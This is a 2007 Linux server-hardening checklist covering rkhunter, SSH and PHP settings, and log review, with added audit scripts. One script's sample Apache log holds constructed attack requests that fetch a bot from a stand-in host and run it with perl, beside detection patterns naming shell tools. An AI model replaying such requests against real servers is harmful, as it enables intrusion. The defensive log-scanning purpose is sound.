Monday, December 24, 2007

100 tweaks to secure your server and prevent hack attempts

How to Secure your Linux Server:

1. Kernel recompile with GR security

2. firewall = CSF

3. Stop unnecessary processes

4. Install Logcheck

5. Install Logwatch

You can optimize host.conf and sysctl.conf; see:
http://www.eth0.us/node/104

To modify Logwatch, SSH into the server and log in as root.

At command prompt type:

nano -w /etc/log.d/conf/logwatch.conf

You will see this entry:

MailTo = root

and change to

MailTo = your@email.com

Note: Set the e-mail address to an offsite account in case you get hacked.

Detail = Low

Change that to Medium, or High...

Detail = 5 or Detail = 10

Note: High will give you more detailed logs with all actions. Save and exit.

6. If it is a cPanel server, check the WHM configuration

7. OpenSSH configuration check

8. Switch from proftpd to pure-ftpd (pure-ftpd is recommended as the more secure of the two)

9. Rootkit Hunter

rkhunter:

1. Log in to your server via SSH as root, then type:

[root@server ~]# cd /usr/local/src/

Download RKHunter version 1.1.4:

[root@server ~]# wget http://downloads.rootkit.nl/rkhunter-1.1.4.tar.gz

Extract the files and run the installer:

[root@server ~]# tar -xzvf rkhunter-1.1.4.tar.gz

[root@server ~]# cd rkhunter

[root@server ~]# ./installer.sh

2. Now set up RKHunter to e-mail you the daily scan reports:

[root@server ~]# nano -w /etc/cron.daily/rkhunter.sh

Add the following (the first line is the shebang; without it cron will not run the script):

#!/bin/bash

(/usr/local/bin/rkhunter -c --cronjob 2>&1 | mail -s "RKhunter Scan Details" replace-this@with-your-email.com)

Replace the e-mail address above with your own. It is best to send the report to an off-site mailbox, so that if the box IS compromised the hacker can't erase the scan report unless he hacks another server too.

[root@server ~]# chmod +x /etc/cron.daily/rkhunter.sh

10. Chkrootkit

Installing chkrootkit

[root@server ~]# wget ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz
[root@server ~]# tar xvfz chkrootkit.tar.gz
[root@server ~]# ./chkrootkit*/chkrootkit

11. mod_security

12. mod_evasive

13. Host spoof protection

14. Operating System check

15. Name server configuration check

16. Disk check

17. Kernel check

18. Apache tune and check

19. MySQL tune and check

20. Enhanced log rotation

21. Day of the week backup rotations

22. Secure /tmp /var/tmp /dev/shm

23. Libsafe for 2.4 kernels

24. Exploit check

25. Delete unnecessary OS users

26. Disable open DNS recursion

27. Enhanced path protection

28. Remove SUID/GUID from binaries

29. PHP hardening

30. phpsuexec

31. Disable vulnerable phpBB installs

32. Initial cPanel configuration

33. Check iptables is configured

34. Check incoming MySQL port

35. Check /etc/cron.daily/logrotate

36. Check /etc/resolv.conf for localhost entry

37. Check /etc/named.conf for recursion restrictions

38. Check server runlevel

39. Check nobody cron

40. Check Operating System support

41. Check SSHv1 is disabled

42. Check SSH on non-standard port

43. Check SSH PasswordAuthentication

44. Check telnet port 23 is not in use

45. Check shell limits

46. Check Background Process Killer

47. Check root forwarder

48. Check exim for extended logging

49. Check php for enable_dl = Off

50. Check php for disable_functions=

disable_functions = show_source, system, shell_exec, passthru, exec, phpinfo, popen, proc_open

allow_url_fopen = Off

(allow_url_fopen is a separate php.ini directive, not a PHP function, so listing it inside disable_functions has no effect; set it on its own line as above.)

51. Check php for register_globals = Off

52. Check php open_basedir protection

53. Check phpsuexec

54. Check cPanel login is SSL only

55. Check boxtrapper is disabled

56. Check max emails per hour is set

57. Check whether users can reset passwords via email

58. Check whether native cPanel SSL is enabled

59. Check compilers

60. Check Anonymous FTP access

61. Check allow remote domains

62. Check block common domains

63. Check allow park domains

64. Check package updates

65. Check security updates

66. Check melange chat server

67. service cups stop; chkconfig cups off

68. service xfs stop; chkconfig xfs off

69. service atd stop; chkconfig atd off

70. service nfslock stop; chkconfig nfslock off

71. service canna stop; chkconfig canna off

72. service FreeWnn stop; chkconfig FreeWnn off

73. service cups-config-daemon stop; chkconfig cups-config-daemon off

74. service iiim stop; chkconfig iiim off

75. service mDNSResponder stop; chkconfig mDNSResponder off

76. service nifd stop; chkconfig nifd off

77. service rpcidmapd stop; chkconfig rpcidmapd off

78. service bluetooth stop; chkconfig bluetooth off

79. service anacron stop; chkconfig anacron off

80. service gpm stop; chkconfig gpm off

81. service saslauthd stop; chkconfig saslauthd off

82. service avahi-daemon stop; chkconfig avahi-daemon off

83. service avahi-dnsconfd stop; chkconfig avahi-dnsconfd off

84. service hidd stop; chkconfig hidd off

85. service pcscd stop; chkconfig pcscd off

86. service sbadm stop; chkconfig sbadm off

87. service webmin stop; chkconfig webmin off

88. Add a load alert script, run from cron every minute

#!/bin/bash
# uptime alert script: mail when the 1-minute load average exceeds 4
UP=`uptime | awk '{print $(NF-2)}' | cut -d. -f1`
if test "$UP" -gt 4
then
    uptime | mail -s "**SERVER LOAD is $UP" mailadd@mail.com
fi

(The mail pipeline must not be wrapped in backticks: that would run it as a command substitution and then try to execute its output.)

89. Ignore ping:

[root@server ~]# iptables -A INPUT -p icmp -j DROP

[root@server ~]# echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all

(Note the space after the 1: "echo 1>/proc/..." is parsed as a redirection of file descriptor 1 and writes an empty line instead of the value.)

[root@server ~] vi /etc/sysctl.conf

Append following line:

net.ipv4.icmp_echo_ignore_all = 1

90. Find directories with 777 permissions.

[root@server ~] find . -type d -perm 777

91. Check for open ports using the nmap command.

92. Disable identification output for Apache

To disable the version output for Apache, SSH into the server and log in as root.

At command prompt type: pico /etc/httpd/conf/httpd.conf

Scroll (way) down and change the following line to

ServerSignature Off

Restart Apache

At command prompt type:

[root@server ~] /etc/rc.d/init.d/httpd restart

93. Set the ssh ListenAddress in /etc/ssh/sshd_config

94. PermitRootLogin no
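As an added check (example script, not from the original post), the following audits an sshd_config for items 41, 42, 43 and 94 above. It assumes the defaults of OpenSSH of that era when a directive is absent (Protocol 2,1, Port 22, PasswordAuthentication yes, PermitRootLogin yes); the two config files are constructed samples, so point it at /etc/ssh/sshd_config on a real box.

```shell
#!/bin/sh
# Added example: audit sshd_config for checks 41-43 and 94 (SSHv1 disabled,
# non-standard port, PasswordAuthentication off, PermitRootLogin no).
# Assumed defaults when a directive is absent: Protocol 2,1, Port 22,
# PasswordAuthentication yes, PermitRootLogin yes. Match blocks are ignored.

# Effective value of a directive: sshd uses the first uncommented occurrence.
# Prints nothing if the directive is absent.
sshd_option() {
    # $1: config file, $2: directive name (sshd treats names case-insensitively)
    awk -v key="$2" 'tolower($1) == tolower(key) { print $2; exit }' "$1"
}

# Print one "FAIL: ..." line per weak setting; exit status is the failure count.
audit_sshd_config() {
    f="$1"; fails=0
    proto=$(sshd_option "$f" Protocol); proto=${proto:-2,1}
    case "$proto" in
        *1*) echo "FAIL: SSH protocol 1 enabled (Protocol $proto)"; fails=$((fails + 1)) ;;
    esac
    port=$(sshd_option "$f" Port); port=${port:-22}
    [ "$port" != "22" ] || { echo "FAIL: sshd on standard port 22"; fails=$((fails + 1)); }
    pa=$(sshd_option "$f" PasswordAuthentication); pa=${pa:-yes}
    [ "$pa" = "no" ] || { echo "FAIL: PasswordAuthentication is $pa"; fails=$((fails + 1)); }
    prl=$(sshd_option "$f" PermitRootLogin); prl=${prl:-yes}
    [ "$prl" = "no" ] || { echo "FAIL: PermitRootLogin is $prl"; fails=$((fails + 1)); }
    return $fails
}

# Constructed sample configs: a weak one and a hardened one.
WEAK_CONF=$(mktemp); HARD_CONF=$(mktemp)
trap 'rm -f "$WEAK_CONF" "$HARD_CONF"' EXIT
cat > "$WEAK_CONF" <<'EOF'
Protocol 2,1
Port 22
PasswordAuthentication yes
#PermitRootLogin no
EOF
cat > "$HARD_CONF" <<'EOF'
Protocol 2
Port 2222
ListenAddress 192.0.2.10
PasswordAuthentication no
PermitRootLogin no
EOF

echo "== weak config =="; audit_sshd_config "$WEAK_CONF" || echo "findings: $?"
echo "== hardened config =="; audit_sshd_config "$HARD_CONF" && echo "OK: no findings"
```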

95. Add a root login alert

vi /root/.bash_profile

Add the following as a single line (a line break before the pipe would break the command):

echo 'ALERT - Root Shell Access on:' `date` `who` | mail -s "Alert: Root Access from `who | awk '{print $6}'`" your@email.com

96. Set an SSH legal message in /etc/motd

97. Use locate to look for common IRC bot, bouncer and web shell files:

locate shell.php
locate irc
locate eggdrop
locate bnc
locate BNC
locate ptlink
locate BitchX
locate guardservices
locate psyBNC
locate .rhosts

98. Perform a UDP and TCP scan here:

http://www.hackerwatch.org/probe

Also, to check whether your Internet connection has reverse DNS, this URL is also worth checking out:

https://www.grc.com/x/ne.dll?bh0bkyd2

99. Check the log files:

[root@server ~]# tail -f /var/log/secure
[root@server ~]# tail -f /var/log/messages
[root@server ~]# lastlog ( /var/log/lastlog is a binary file, so read it with the lastlog command rather than tail )
[root@server ~]# tail -f /var/log/security ( logs related to kernel and ICMP/ TCP)

and the other log files (depending on your OS distro) of the services running, to see if there are any issues.

vmstat

Displays information about memory, cpu and disk.
Ex: bash# vmstat 1 4 (where 1 is delay and 4 is count)

mpstat

Displays statistics about cpu utilization. This will help us to see whether your cpu is overworked or not.
Ex: bash# mpstat 1 4 (where 1 is delay and 4 is count)

iostat

This command displays statistics about the disk system.
Useful options:
-d - Gives the device utilization report.
-k - Display statistics in kilobytes per second.
Ex: bash# iostat -dk 1 4 (where 1 is delay and 4 is count)

sar

Displays overall system performance.

Check to see if your server has any hidden processes running.

ps

Displays the status of all known processes.

100. lsof

Lists all open files. In Linux everything is considered a file, so you will be able to see almost all of the activity on your system with this command.

A few more hardening steps:

[root@server ~]# chmod -R 700 /etc/rc.d/init.d/*
* Use rpm -Va to find out whether a package's files have been modified
* Apply security patches to vulnerable software (i.e. patch -p1 < patchfile)
* Remove all unneeded ttys and console logins by removing their entries from /etc/securetty
* Check system logs (e.g. /var/log/messages, /var/log/secure, etc.)
* Set a password on the boot loader (lilo and grub both support this)
* Monitor the system (nagios or big brother)
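The rpm -Va step above produces a lot of noise (config files you edited, mtime-only changes). This added script (example code, not from the original post) filters its output down to the lines that matter when hunting a replaced binary: non-config files with a changed digest, mode or owner, and files that have gone missing. The rpm -Va output it reads here is a constructed sample.

```shell
#!/bin/sh
# Added example (not from the original post): triage `rpm -Va` output.
# Each line is a flag string (S size, M mode, 5 digest, D device, L link,
# U user, G group, T mtime; newer rpm adds P), an optional type
# ('c' config, 'd' doc, ...) and the path; missing files print as "missing  path".
# A changed digest or mode on a non-config file is what a replaced binary
# (a rootkit's ls or ps, say) looks like; edited config files and
# mtime-only changes are normal and are filtered out. Sample output is constructed.

# Print "flags path" for non-config, non-doc files whose digest, mode, user or
# group changed, and "missing path" for files that have disappeared.
rpm_suspect_files() {
    # $1: file containing `rpm -Va` output (paths with spaces are not handled)
    awk 'NF >= 2 {
        flags = $1; path = $NF; type = (NF >= 3) ? $(NF-1) : ""
        if (flags == "missing") { print "missing " path; next }
        if (type == "c" || type == "d") next
        if (index(flags, "5") || index(flags, "M") || index(flags, "U") || index(flags, "G"))
            print flags " " path
    }' "$1"
}

SAMPLE=$(mktemp); trap 'rm -f "$SAMPLE"' EXIT
cat > "$SAMPLE" <<'EOF'
S.5....T.  c /etc/ssh/sshd_config
.......T.    /usr/bin/gcc
S.5....T.    /bin/ls
.M.......    /usr/bin/passwd
missing      /usr/sbin/sestatus
..5....T.  c /etc/php.ini
.....UG..    /usr/bin/ps
EOF

# Expected: /bin/ls, /usr/bin/passwd, the missing sestatus and /usr/bin/ps;
# gcc (mtime only) and the two edited config files are dropped.
rpm_suspect_files "$SAMPLE"
```

Anything it prints should be compared against a clean copy of the package (rpm -Vp on the original .rpm, or the same file on a known-good host) before trusting the box.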

Install AIDE (Advanced Intrusion Detection Environment), a free replacement for Tripwire:

http://www.cs.tut.fi/~rammer/aide.html

Testing phase when in production:

Use tools like nessus, nikto, and nmap to do a penetration test and see how well your server is secured.

Also do a stress test.

[root@server ~]# find /usr/local/apache/domlogs -exec egrep -iH '(wget|curl|lynx|gcc|perl|sh|cd|mkdir|touch)%20' {} \;

[root@server ~]# find /usr/local/apache/domlogs -exec grep -EiH '(wget|curl|lynx|gcc|perl|sh|cd|mkdir|touch)%20' {} \;

Note: egrep works on FreeBSD; on other distros like CentOS use grep -E, which is the same extended-regex search (plain grep without -E treats the parentheses and | literally and would match nothing).
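The same domlogs search as an added script (not from the original post) that scans one Apache access log for URL-encoded shell commands in the request and tallies hits per client IP, so the source of an attack stands out. The log lines are constructed; on a cPanel box loop it over /usr/local/apache/domlogs/*.

```shell
#!/bin/sh
# Added example, not part of the original post: scan an Apache access log for
# the post's pattern (a shell command followed by an encoded space) and
# summarise the hits per client IP. Sample log lines below are constructed.

# Same alternation as the find/egrep above, used with grep -E.
CMD_PATTERN='(wget|curl|lynx|gcc|perl|sh|cd|mkdir|touch)%20'

# Print the log lines whose request contains the pattern (case-insensitive).
find_cmd_injection() {
    # $1: Apache combined-format access log
    grep -Ei "$CMD_PATTERN" "$1"
}

# "count ip" per client, busiest first.
cmd_injection_by_ip() {
    find_cmd_injection "$1" | awk '{print $1}' | sort | uniq -c | sort -rn | awk '{print $1, $2}'
}

SAMPLE_LOG=$(mktemp); trap 'rm -f "$SAMPLE_LOG"' EXIT
cat > "$SAMPLE_LOG" <<'EOF'
203.0.113.5 - - [24/Dec/2007:10:01:02 +0000] "GET /index.php?page=http://bad.example/c.txt?&cmd=wget%20http://bad.example/bot HTTP/1.1" 200 512 "-" "Mozilla"
198.51.100.7 - - [24/Dec/2007:10:01:05 +0000] "GET /images/logo.png HTTP/1.1" 200 8912 "-" "Mozilla"
203.0.113.5 - - [24/Dec/2007:10:01:09 +0000] "GET /forum/index.php?id=1;cd%20/tmp;perl%20bot.pl HTTP/1.1" 500 0 "-" "libwww-perl/5.8"
192.0.2.9 - - [24/Dec/2007:10:02:00 +0000] "GET /search.php?q=touch%20screen HTTP/1.1" 200 300 "-" "Mozilla"
EOF

# The last sample line shows the pattern's weakness: "touch%20screen" is an
# ordinary search term, so review matches by hand rather than blocking on them.
echo "== matching requests =="; find_cmd_injection "$SAMPLE_LOG"
echo "== hits per IP =="; cmd_injection_by_ip "$SAMPLE_LOG"
```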